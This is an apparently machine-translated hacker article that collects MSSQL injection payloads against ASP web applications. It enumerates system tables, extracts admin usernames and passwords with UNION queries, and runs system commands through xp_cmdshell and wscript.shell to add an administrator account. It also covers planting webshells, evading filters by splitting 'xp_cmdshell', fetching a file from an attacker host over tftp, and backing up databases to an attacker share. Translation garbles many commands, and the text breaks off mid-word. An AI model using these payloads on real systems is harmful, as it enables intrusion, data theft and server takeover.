Some injection techniques in mssql Databases

By: F19ht

When my younger brother arrived, I wrote a small article to show you how to keep an eye on the official website. This is a summary of some ideas during penetration testing. Laugh

SQL Injection first originated from 'or '1' = '1)
The most important table name:
Select * from sysobjects
Sysobjects ncsysobjects
Sysindexes tsysindexes
Syscolumns
Policypes
Sysusers
Sysdatabases
Sysxlogins
Sysprocesses
The most important user names (the default SQL database exists)
Public
Dbo
Guest (generally forbidden or not authorized)
Db_sercurityadmin
AB _dlladmin
Some default extensions
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia drive
Xp_dirtree directory
Xp_enumdsn ODBC connection
Xp_loginconfig server security mode information
Xp_makecab: Create a compressed volume
Xp_ntsec_enumdomains domain Information
Xp_terminate_process terminal process, and a PID is provided.
For example:
Sp_addextendedproc 'xp _ webserver', 'c:/temp/xp_foo.dll'
Exec xp_webserver
Sp_dropextendedproc 'xp _ webserver'
Bcp "select * FROM test .. foo" queryout c:/inetpub/wwwroot/runcommand. asp-c-Slocalhost-Usa-Pfoobar
'Group by users. id having 1 = 1-
'Group by users. id, users. username, users. password, users. privs having 1 = 1-
'; Insert into users values (666, 'attacker', 'foobar', 0 xffff )-
Union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable '-
Union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' where COLUMN_NAME not in ('login _ id ')-
Union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' where COLUMN_NAME not in ('login _ id', 'login _ name ')-
Union select TOP 1 login_name FROM logintable-
Union select TOP 1 password FROM logintable where login_name = 'rahul '--
Construct statement: query whether xp_cmdshell exists
'Union select @ version, 1, 1 --
And 1 = (select @ VERSION)
And 'sa '= (select System_user)
'Union select ret, 1, 1 from foo --
'Union select min (username), 1, 1 from users where username> 'a '-
'Union select min (username), 1, 1 from users where username> 'admin '-
'Union select password, 1, 1 from users where username = 'admin '--
And user_name () = 'dbo'
And 0 <> (select user_name ()-
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c:/WIndows/system32/cmd.exe/C net user admin 123456/add'
And 1 = (select count (*) FROM master. dbo. sysobjects where xtype = 'X' AND name = 'xp _ Your shell ')
; EXEC master. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'
1 = (% 20 select % 20 count (*) % 20 from % 20master. dbo. sysobjects % 20 where % 20 xtype = 'X' % 20and % 20 name = 'xp _ Your shell ')
And 1 = (select IS_SRVROLEMEMBER ('sysadmin') to determine whether the sa permission is
And 0 <> (select top 1 paths from newtable) -- database Brute Force
And 1 = (select name from master. dbo. sysdatabases where dbid = 7) Get the Database name (from 1 to 5 is the System id, 6 or more can be determined)
Create a virtual directory edisk:
Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c:/inetpub/wwwroot/mkwebdir. vbs-w "Default Web site"-v "e", "e :/"'
Access attributes: (write a webshell together)
Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c:/inetpub/wwwroot/chaccess. vbs-a w3svc/1/ROOT/e + browse'
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
Submit dbid =, 9... to get more database names.
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U') brute-force to a table is assumed to be admin
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U' and name not in ('admin') to obtain other tables.
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = 'U' and name = 'admin'
And uid> (str (id) the value of the brute-force UID is assumed to be 18779569 uid = id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569) to obtain an admin field, which is assumed to be user_id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569 and name not in
('Id',...) to expose other fields
And 0 <(select user_id from BBS. dbo. admin where username> 1) to get the user name
The password can be obtained in turn ..... Assume that fields such as user_id username and password exist.
Show. asp? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin
Show. asp? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin
(Union statements are popular everywhere, and access is also useful.
Special tips for database violence: % 5c = '/' or submit/AND/modify % 5
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U ')
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'U' and name not in ('address '))
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = 'U' and name = 'admin' and uid> (str (id) determine the id value
And 0 <> (select top 1 name from BBS. dbo. syscolumns where id = 773577794) All fields
Http://xx.xx.xx.xx/111.asp? Id = 3400; create table [dbo]. [swap] ([swappass] [char] (255 ));--
Http://xx.xx.xx.xx/111.asp? Id = 3400 and (select top 1 swappass from swap) = 1
; Create TABLE newtable (id int IDENTITY (500), paths varchar () Declare @ test varchar (20) exec master .. xp_regread @ rootkey = 'HKEY _ LOCAL_MACHINE ', @ key = 'System/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/', @ value_name = '/', values = @ test OUTPUT insert into paths (path) values (@ test)
Http: // 61.131.96.39/PageShow. asp? TianName = Policy and Regulation & InfoID = {57C4165A-4206-4C0D-A8D2-E70666EE4E08}; use % 20 master; declare % 20 @ s % 20% 20int; exec % 20sp_oacreate % 20 "wscript. shell ", @ s % 20out; exec % 20sp_oamethod % 20 @ s," run ", NULL," cmd.exe % 20/c % 20 ping % 201.1.1.1 ";--
The following figure shows the web path d:/xxxx:
Http://xx.xx.xx.xx/111.asp? Id = 3400; use ku1 ;--
Http://xx.xx.xx.xx/111.asp? Id = 3400; create table cmd (str image );--
The traditional test process with xp_cmdshell:
; Exec master .. xp_mongoshell 'dir'
; Exec master. dbo. sp_addlogin hax ;--
; Exec master. dbo. sp_password null, hax, hax ;--
; Exec master. dbo. sp_addsrvrolemember hax sysadmin ;--
; Exec master. dbo. xp_mongoshell 'net user admin 123456/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. dbo. xp_mongoshell 'net localgroup administrators admin/add ';--
Exec master.. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server'
Http://www.xxx.com/list.asp? Classid = 1; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c:/WINNT/system32/cmd.exe/C net user admin 123456/add'
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c:/WINNT/system32/cmd.exe/C net localgroup administrators admin/add'
Http: // localhost/show. asp? Id = 1; exec master .. xp_cmdshell 'tftp-I youip get file.exe '-
Declare @ a sysname set @ a = 'xp _ '+ 'your shell' exec @ a' dir c :/'
Declare @ a sysname set @ a = 'xp '+' _ cm '+ 'dshell' exec @ a' dir c :/'
; Declare @ a; set @ a = db_name (); backup database @ a to disk = 'your IP address, your shared directory bak. dat'
If it is restricted, you can.
Se